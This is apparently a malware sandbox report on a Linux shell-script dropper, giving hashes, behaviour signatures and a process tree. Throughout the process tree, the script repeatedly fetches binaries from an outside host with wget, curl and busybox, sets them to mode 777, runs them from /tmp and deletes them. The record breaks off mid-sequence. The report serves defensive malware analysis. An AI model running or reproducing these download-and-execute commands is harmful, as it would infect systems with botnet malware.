Analysis
-
max time kernel
79s -
max time network
81s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
29/10/2024, 02:30
Static task
static1
Behavioral task
behavioral1
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
-
Size
10KB
-
MD5
d41afa47fc6a06a1cfb7b25f1b6510db
-
SHA1
1ef345877ccc2780055713bec262b92657b1e4a1
-
SHA256
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
-
SHA512
5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
-
SSDEEP
96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 752 chmod 891 chmod 738 chmod 907 chmod 899 chmod 921 chmod 972 chmod 995 chmod 877 chmod 1011 chmod 965 chmod 914 chmod 1003 chmod 831 chmod 928 chmod 935 chmod 943 chmod 987 chmod 847 chmod 812 chmod 979 chmod 1018 chmod 783 chmod 820 chmod 884 chmod 951 chmod 958 chmod 745 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 739 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 746 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 754 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 785 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 813 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 821 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q 832 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB 848 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 878 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em 885 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ 892 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 900 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD 908 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l 915 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 922 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 929 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 936 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 944 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 952 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 959 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q 966 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 973 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD 980 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l 988 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB 996 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 1004 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em 1012 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ 1019 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1002 busybox 1017 busybox 906 busybox 968 wget 789 wget 955 curl 1008 curl 1014 wget 736 busybox 742 curl 918 curl 920 busybox 975 wget 796 curl 836 curl 896 curl 903 wget 924 wget 925 curl 954 wget 986 busybox 824 wget 864 curl 1000 curl 913 busybox 749 curl 809 busybox 969 curl 999 wget 816 wget 817 curl 961 wget 1015 curl 748 wget 883 busybox 825 curl 898 busybox 931 wget 947 wget 744 busybox 751 busybox 895 wget 830 busybox 853 wget 939 wget 942 busybox 888 curl 964 busybox 992 curl 1010 busybox 741 wget 835 wget 880 wget 890 busybox 976 curl 983 wget 1007 wget 716 wget 843 busybox 779 busybox 881 curl 932 curl 934 busybox 978 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 curl File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ curl File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 curl File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx curl File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l curl File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw curl File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F curl File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q curl File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em curl File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP curl File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB curl File opened for modification /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em curl File opened for modification /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ curl File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP curl File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw curl File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 curl File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F curl File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl File opened for modification /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3 curl File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD curl File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB curl File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx curl File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q curl File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l curl File opened for modification /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD curl
Processes
-
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:744
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:747
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:748
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:751
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:779
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:788
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:789
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:815
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:819
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:830
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:874
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:927
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:950
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
